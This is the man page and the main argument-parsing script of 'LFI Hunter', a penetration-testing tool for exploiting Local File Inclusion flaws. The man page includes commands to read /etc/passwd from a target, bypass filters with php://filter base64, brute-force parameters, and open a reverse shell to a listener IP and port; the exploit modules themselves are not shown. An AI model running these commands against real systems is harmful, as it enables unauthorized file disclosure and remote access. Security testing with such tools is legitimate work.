Package/lfi_Hunter.1
NAME
       LFI Hunter - Command-line tool for Local File Inclusion (LFI) vulnerability testing on web applications

SYNOPSIS
       LFI_Hunter [OPTIONS]

DESCRIPTION
       LFI Hunter is a powerful command-line tool designed for testing and exploiting Local File Inclusion (LFI) vulnerabilities in web applications. It offers options for authenticated and unauthenticated LFI attacks, parameter fuzzing, reverse shell setup, and the reading of specific files. This tool assists ethical hackers and security researchers in assessing web application security by exploiting file inclusion vulnerabilities in a controlled environment.

       **LFI Hunter is licensed for user use only, with no permission for code modification.** It is available on GitHub: https://github.com/jac11/LFI_Hunter.
OPTIONS
       -UV, --Vulnurl                  Target URL for the vulnerable web application (required)
       --auth                          Enable authentication mode
       -F, --filelist                  Read from an LFI wordlist file
       -C, --Cookie                    Provide the login session cookie
       -B, --base64                    Enable decoding of base64-filtered PHP code
       -R, --read                      Specify a file to read from the target machine
       -UF, --UserForm                 Specify the HTML login form username field
       -PF, --PassForm                 Specify the HTML login form password field
       -P, --password                  Specify a password
       -p, --readpass                  Read a password from a file
       -LU, --loginurl                 Provide the login URL for authentication mode
       -U, --user                      Specify a username
       -u, --readuser                  Read a username from a file
       -A, --Aggressiv                 Enable aggressive mode
       --port                          Set the port for netcat
       -S, --shell                     Set up a reverse shell connection
       -Z, --fuzzing                   Enable brute-force mode
       --config                        Use a configuration file with all options
       -FP, --PARAME                   parameter fuzzing [replace the parameter with PARAME in url]
       -PL, --paramslist               parameter fuzzing wordlist


       -UV, --Vulnurl URL
              Specifies the target URL for the web application vulnerable to LFI. The URL must include the path where testing will be performed.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file=   -C -C session_cookie.txt 

       --auth
              Enables authentication mode, allowing the tool to interact with restricted areas within the application that require login credentials.
              This mode is beneficial for testing areas accessible only to logged-in users.

       -F, --filelist FILE
              Specifies a wordlist file containing paths or filenames to attempt during the LFI attack. The tool will iterate through each line of the wordlist to identify vulnerable files.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file=   -C -C session_cookie.txt  -F lfi_wordlist.txt
              default_wordlist
              by default if not wordlist specified. tool will Using the internal default wordlist



       -C, --Cookie FILE

              This option specifies a file containing a session cookie used for maintaining an authenticated session with the target web application. The command attempts to exploit a local file inclusion vulnerability at the specified URL while utilizing the session cookie read from the provided file (e.g., session_cookie.txt).

              By using this option, you can test the LFI vulnerability at the given URL without passing credentials directly in the command line. This is particularly useful for handling session cookies that may contain special characters that could lead to errors if passed directly in the terminal.

              Ensure that the specified file contains valid session cookie information needed to maintain the session with the target application.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file=  -C session_cookie.txt  --auth 
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file=  -C session_cookie.txt  

       -B, --base64

              Enables the use of the PHP filter php://filter/read=convert.base64-encode/resource=. This option allows for decoding base64-encoded PHP code retrieved from the target server. It can be particularly useful for uncovering sensitive information or hidden code segments that may be obfuscated in base64 format. Additionally, this option may help bypass certain security measures implemented on the website.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file=  -C session_cookie.txt  -B

       -R, --read FILE
             Specifies a file to attempt reading from the target machine. Common file paths for LFI attacks include /etc/passwd and configuration files.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file=  -C session_cookie.txt  -R /etc/passwd

       -UF, --UserForm FIELD
              Specifies the HTML form field for the username input on the login form. Useful when the field name does not follow standard conventions.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt /login --auth -UF login_user

       -PF, --PassForm FIELD
              Specifies the HTML form field for the password input on the login form, allowing customization for applications with non-standard form field names.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt /login --auth -PF login_pass

       -P, --password PASSWORD
              Allows the direct input of a password for login attempts. For security, consider using this option with caution or combining it with --auth.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt  --auth -U admin -P mypassword

       -p, --readpass FILE
              Reads the password from a specified file rather than directly entering it in the command. This approach is often preferred for automation scripts.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt /login --auth -p password_file.txt

       -LU, --loginurl URL
              Provides the login URL for applications where the login path differs from the main application path. This can streamline access to restricted areas of the site.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file=  -C session_cookie.txt  --auth -LU http://example.com/login

       -U, --user USERNAME
              Specifies a username for login attempts, allowing interaction with the authenticated sections of the application.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt /login --auth -U admin

       -u, --readuser FILE
              Reads the username from a specified file instead of entering it directly. Useful for testing multiple usernames.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file=   -C session_cookie.txt /login --auth -u usernames.txt

       -A, --Aggressiv
              Enables aggressive mode, increasing the number and speed of requests, thereby expediting the testing process. Recommended only for controlled environments, as it can increase server load.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file=   -C session_cookie.txt  --auth -A

       --port PORT
              Specifies a port to use for operations that involve network connections, such as reverse shells. This option ensures the tool uses a non-default port.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file=   -C session_cookie.txt  -S 192.168.1.5 --port 4444

       -S, --shell CONNECTION
              Sets up a reverse shell connection to a specified IP address and port. If the target system is vulnerable, this feature enables remote access for testing purposes.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt  -S 192.168.1.5:4444

       -Z, --fuzzing
              Enables brute-force or fuzzing mode, attempting a wide range of values for parameters to test for potential vulnerabilities or hidden endpoints.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt  --auth -Z

       --config FILE
              Uses a configuration file that sets predefined options, reducing the need for repeated command-line entry in complex tests.
              Example:
              LFI_Hunter --config example.com.ini

       -FP, --PARAME
              Executes parameter fuzzing by replacing specified parameters with "PARAME" in the URL. Allows testing of different values for injection vulnerabilities.
              Example:
              LFI_Hunter -FP http://example.com/vulnerable_path/?PARAME=file.php

       -PL, --paramslist FILE
              Provides a wordlist file for parameter fuzzing, containing various parameters to insert into the URL for testing purposes.
              Example:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt  -PL fuzz_params.txt

EXAMPLES
       Basic URL scan with authentication and aggressive mode enabled:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt  --auth -A -LU http://example.com/login -U admin -P password

       Use base64 decoding to reveal hidden PHP code:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt  -B

       Parameter fuzzing using a custom wordlist:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt  -FP -PL fuzz_wordlist.txt

       Read the /etc/passwd file from a vulnerable URL:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt  -R /etc/passwd

       Reverse shell setup to a target IP and port:
              LFI_Hunter -UV http://example.com/-UV http://example.com/vulnerable_path?file= -C session_cookie.txt  -S 192.168.0.10 --port 5555

EXIT STATUS
       0      Successful execution.
       1      General error, such as invalid command input.
       2      Misuse of command options.

FILES
       config.txt
              Configuration file for LFI Hunter that stores default options, useful for automation.

       lfi_wordlist.txt
              Wordlist file for LFI testing, containing various common paths and filenames.

       fuzz_params.txt
              Wordlist for parameter fuzzing, listing potential parameters for injection.

SEE ALSO
       nc(1), curl(1), wget(1), python(1)

AUTHOR
       Developed by jac11. For issues, contributions, or further information, visit the GitHub repository: https://github.com/jac11/LFI_Hunter.

LICENSE
       LFI Hunter is licensed for user use only, with no permission to modify any source code.


LFI_Hunter.py
#!/usr/bin/env python3
import configparser
import argparse
import re
import sys

with open('./Package/Banner','r') as banner:
    print(banner.read())

class Hannter_LFI:
      
      def __init__(self):
         self.control()
        
         if self.args.readuser :
            try:
                with open(self.args.readuser,'r') as username:
                      self.args.user = username.read().replace('/n','')
            except FileNotFoundError as e :
                print('\n'+'='*20+"\n[*] ERROR-INFO "+'\n'+'='*30+'\n')
                print("[*] Error : ",e )
                print('\n'+'='*10+"\n[*] Solution "+'\n'+'='*14+'\n')
                print("[*] find the correct Path ")
                exit()          
         if self.args.readpass :
            try : 
                with open(self.args.readpass,'r') as password:
                   self.args.password = password.read().replace('/n','')  
            except FileNotFoundError as e :
                print('\n'+'='*20+"\n[*] ERROR-INFO "+'\n'+'='*30+'\n')
                print("[*] Error : ",e )
                print('\n'+'='*10+"\n[*] Solution "+'\n'+'='*14+'\n')
                print("[*] find the correct Path ")  
                exit()   
         if self.args.Aggressiv :
               from Package.aggressiv import Aggressiv  

               if self.args.auth and self.args.Vulnurl\
                  and self.args.password and self.args.user\
                  and self.args.Cookie and self.args.loginurl\
                  and self.args.Aggressiv or self.args.config :  

                     Aggressiv.__init__(self,args = self.control)          
                     Aggressiv.Login_auth(self,args = self.control)
                     Aggressiv.url_request(self,args = self.control)
                     Aggressiv.Scan_result(self,aegs = self.control) 

               elif not self.args.auth and self.args.Vulnurl\
               and not self.args.password and not self.args.user and self.args.Cookie\
               and self.args.Aggressiv or self.args.config:
                  Aggressiv.__init__(self,args = self.control)
                  Aggressiv.url_request(self,args = self.control)
                  Aggressiv.Scan_result(self,aegs = self.control)

               else:
                  print('\n'+'='*20+"\n[*] ERROR-INFO "+'\n'+'='*30+'\n')
                  print("[*] Error :  Bad argument Logic command  Error" )
                  print('\n'+'='*10+"\n[*] Solution "+'\n'+'='*14+'\n')
                  print('[+] To use LFI with login     : --auth --loginurl --Vulnurl --user --password --filelist --Cookie ') 
                  print('[+] To use LFI without  login : --Vulnurl --filelist --Cookie') 
                  print("[*] ckeck Readme file at      : https://www.github/jac11/LFI_Hunter.git")
                  exit()  
         elif self.args.fuzzing  :
              from Package.main_lfi import Local_File_In
              Local_File_In.__init__(self,args = self.control)
              Local_File_In.url_request(self,args = self.control)
              Local_File_In.Scan_result(self,aegs = self.control)
      
         elif self.args.read :
              from Package.one_read import Read_File
              Read_File.__init__(self,args = self.control)  
              Read_File.Login_auth(self,aegs = self.control)
              Read_File.Scan_result(self,aegs = self.control)
         elif self.args.PARAME :
            from Package.parameters import UrlParameters
            UrlParameters.Fprint_Print(self,args=self.control) 
            UrlParameters.URL_separated(self,args=self.control)
                                 
      def control(self): 
         try: 
            parser = argparse.ArgumentParser(
               description="Usage: [Option] [arguments] [-w] [arguments]",
                epilog="Example: python LFI_Hunter.py -FP file1.php"
           )
            parser.add_argument("--man", action='store_true', help="see man page")
            parser.add_argument("-UV", "--Vulnurl", action="store", required=False, help="Target URL for the vulnerable web application")
            parser.add_argument("--auth", action='store_true', help="Enable authentication mode")
            parser.add_argument("-F", "--filelist", action="store", help="Read from an LFI wordlist file")
            parser.add_argument("-C", "--Cookie", action="store", required=False, help="Provide the login session cookie")
            parser.add_argument("-B", "--base64", action='store_true', help="Enable decoding of base64-filtered PHP code")
            parser.add_argument("-R", "--read", action="store", help="Specify a file to read from the target machine")
            parser.add_argument("-UF", "--UserForm", action="store", help="Specify the HTML login form username field")
            parser.add_argument("-PF", "--PassForm", action="store", help="Specify the HTML login form password field")
            parser.add_argument("-P", "--password", action="store", help="Specify a password")
            parser.add_argument("-p", "--readpass", action="store", help="Read a password from a file")
            parser.add_argument("-LU", "--loginurl", action="store", help="Provide the login URL for authentication mode")
            parser.add_argument("-U", "--user", action="store", help="Specify a username")
            parser.add_argument("-u", "--readuser", action="store", help="Read a username from a file")
            parser.add_argument("-A", "--Aggressiv", action='store_true', help="Enable aggressive mode")
            parser.add_argument("--port", action="store", help="Set the port for netcat")
            parser.add_argument("-S", "--shell", action="store", help="Set up a reverse shell connection")
            parser.add_argument("-Z", "--fuzzing", action='store_true', help="Enable brute-force mode")
            parser.add_argument("--config", action='store', help="Use a configuration file with all options")
            parser.add_argument("-FP","--PARAME", action='store', help="parameter fuzzing [replace the parameter with PARAME in url]\
             [Fuzzed URL: http://example.com/vulnerabilities/fi/?PARAME=file1.php]")
            parser.add_argument("-PL","--paramslist", action='store', help="parameter fuzzing wordlist")
          
            self.args = parser.parse_args() 
            if len(sys.argv) == 1 :
               parser.print_help()      
               exit()
            if self.args.man:
                from Package.lfi_info import ManPage
                ManPage.man_info(self,args=self.control)
                exit()
            try: 
               if not self.args.config:
                  dlink = str(re.search(r'https?://(www\.)?([a-zA-Z0-9]+)(\.[a-zA-Z0-9.-]+)', self.args.Vulnurl)).split()
                  ip_re = (dlink[-1][7:-2])
                  ip_re = ip_re[7:]
            except Exception :
                try:
                   ip_re = re.search(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})',self.args.Vulnurl)
                   ip_re = ip_re.group()   
                except Exception:
                    try:
                       dlink = str(re.search(r'https?://(www\.)?([a-zA-Z0-9]+)(\.[a-zA-Z0-9.-]+)', self.args.PARAME)).split()
                       ip_re = (dlink[-1][7:-2])
                       ip_re = ip_re[7:]
                    except Exception:
                        try:
                            ip_re = re.search(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})',self.args.PARAME)
                            ip_re = ip_re.group()  
                        except Exception:
                            exit()       
            if len(sys.argv) > 1 and not self.args.config:
               config = configparser.ConfigParser()
               if   self.args.Cookie:
                      config['Cookie']={}
                      config['Cookie']['Cookie']= self.args.Cookie                   
               if   self.args.Vulnurl:
                      config['Vulnurls']={}
                      config['Vulnurls']['Vulnurl']= self.args.Vulnurl             
               if   self.args.filelist:
                      config['filelist']={}
                      config['filelist'][ 'filelist']= self.args.filelist                     
               if   self.args.read:
                      config['read']={}
                      config['read'][ 'read']= self.args.read                      
               if   self.args.UserForm:
                      config['UserForm']={}
                      config['UserForm'][ 'UserForm']= self.args.UserForm                     
               if   self.args.PassForm:
                      config['PassForm']={}
                      config['PassForm'][ 'PassForm']= self.args. PassForm                 
               if   self.args.password:
                      config['password']={}
                      config['password'][ 'password']= self.args.password               
               if   self.args.loginurl:
                      config['loginurl']={}
                      config['loginurl'][ 'loginurl']= self.args.loginurl                
               if   self.args.user:
                      config['user']={}
                      config['user'][ 'user']= self.args.user                   
               if   self.args.port:
                      config['port']={}
                      config['port'][ 'port']= self.args.port                      
               if   self.args.shell:
                      config['shell']={}
                      config['shell'][ 'shell']= self.args.shell                    
               if   self.args.readpass:
                      config['readpass']={}
                      config['readpass'][ 'readpass']= self.args.readpass
               if   self.args.fuzzing:
                      config['fuzzing']={}
                      config['fuzzing'][ 'fuzzing']= "True" 
               if   self.args.Aggressiv:
                      config['Aggressiv']={}
                      config['Aggressiv'][ 'Aggressiv']= "True" 
               if self.args.auth:
                      config['auth']={}
                      config['auth']['auth'] ="True"
               if self.args.base64:
                      config['base64']={}
                      config['base64']['base64'] ="True"     
               if self.args.readuser:
                      config['readuser'] ={}
                      config['readuser']['readuser']= self.args.readuser  
               if self.args.PARAME:
                      config['PARAME'] ={}
                      config['PARAME']['PARAME']= self.args.PARAME
               if self.args.paramslist:
                      config['paramslist'] ={}
                      config['paramslist']['paramslist']= self.args.paramslist 

               with open("./Package/ConfigFile/"+ip_re+'.ini', 'w') as configfile:
                    config.write(configfile)  
            elif len(sys.argv) > 1 and self.args.config:
               config = configparser.ConfigParser()
               config.read("./Package/ConfigFile/"+self.args.config)
               if not self.args.Vulnurl and 'Vulnurls' in config:
                  self.args.Vulnurl = config['Vulnurls'].get('Vulnurl')
               if not self.args.Cookie and 'Cookie' in config:
                   self.args.Cookie = config['Cookie'].get('Cookie')
               if not self.args.filelist and 'filelist' in config:
                   self.args.filelist = config['filelist'].get('filelist')
               if not self.args.read and 'read' in config:
                   self.args.read = config['read'].get('read')
               if not self.args.UserForm and 'UserForm' in config:
                   self.args.UserForm = config['UserForm'].get('UserForm')
               if not self.args.PassForm and 'PassForm' in config:
                   self.args.PassForm = config['PassForm'].get('PassForm')
               if not self.args.password and 'password' in config:
                   self.args.password = config['password'].get('password')
               if not self.args.loginurl and 'loginurl' in config:
                   self.args.loginurl = config['loginurl'].get('loginurl')
               if not self.args.user and 'user' in config:
                   self.args.user = config['user'].get('user')
               if not self.args.port and 'port' in config:
                   self.args.port = config['port'].get('port')
               if not self.args.shell and 'shell' in config:
                   self.args.shell = config['shell'].get('shell')
               if not self.args.readpass and 'readpass' in config:
                   self.args.readpass = config['readpass'].get('readpass')
               if not self.args.readuser and 'readuser' in config:
                   self.args.readuser = config['readuser'].get('readuser')
               if not self.args.PARAME and 'PARAME' in config:
                   self.args.PARAME = config['PARAME'].get('PARAME')   
               if not self.args.paramslist and 'paramslist' in config:
                   self.args.paramslist = config['paramslist'].get('paramslist')    
               if not self.args.fuzzing and 'fuzzing' in config:
                   self.args.fuzzing = config['fuzzing'].getboolean('fuzzing')
               if not self.args.Aggressiv and 'Aggressiv' in config:
                   self.args.Aggressiv = config['Aggressiv'].getboolean('Aggressiv')
               if not self.args.base64 and 'base64' in config:
                   self.args.base64 = config['base64'].getboolean('base64')
               if not self.args.auth and 'auth' in config:
                   self.args.auth = config['auth'].getboolean('auth')
            

         except AssertionError as a :
            print('\n'+'='*20+"\n[*] ERROR-INFO "+'\n'+'='*30+'\n')
            print("[*] Error :  Bad argument" )
            print('\n'+'='*10+"\n[*] Solution "+'\n'+'='*14+'\n')
            print("[*] try to use --help")
            print("[*] Check Readme file at : https://www.github/jac11/LFI_Hunter.git")
            exit()           
if __name__=='__main__':
    Hannter_LFI()